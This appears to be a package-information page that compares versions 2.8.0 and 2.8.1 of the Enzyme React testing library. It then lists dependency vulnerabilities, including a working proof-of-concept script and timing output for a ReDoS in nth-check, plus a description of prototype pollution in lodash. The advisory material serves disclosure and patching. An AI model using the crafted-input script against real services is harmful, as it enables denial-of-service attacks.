Enzyme 2.8.1 is a minor update to the popular JavaScript testing utility for React, building upon version 2.8.0. Both versions maintain the core functionality of simplifying React component testing by providing tools for shallow rendering, full DOM rendering, and static rendering. Key dependencies like cheerio, lodash, and prop-types remain consistent, ensuring compatibility with existing workflows.
However, subtle differences exist, primarily within the development dependencies. Version 2.8.1 incorporates newer versions of several Babel packages (babel-cli, babel-core, babel-eslint, babel-preset-airbnb, babel-register), lodash, eslint, eslint-plugin-react, and rimraf potentially addressing bug fixes, performance improvements, or security patches within those tools. Notably, there are also updates on sinon. The update is on sinon from 1.17.6 to 1.17.7. While these changes don't directly impact Enzyme's API or core functionality, they contribute to a more stable and up-to-date development environment for contributors and users who rely on these tools for their testing pipelines.
Choosing between 2.8.0 and 2.8.1 depends primarily on the developer's comfort level with updating development dependencies. If a project already utilizes a similar stack of Babel, ESLint, and other tools, upgrading to 2.8.1 might be beneficial to leverage the latest improvements. Conversely, if stability and minimal changes are preferred, sticking with 2.8.0 remains a viable option as the core Enzyme functionalities are practically identical, and React compatibility is ensured by the peerDependencies specification, which supports React versions 0.13.x, 0.14.x, and ^15.0.0-0 up to 15.x.
All the vulnerabilities related to the version 2.8.1 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.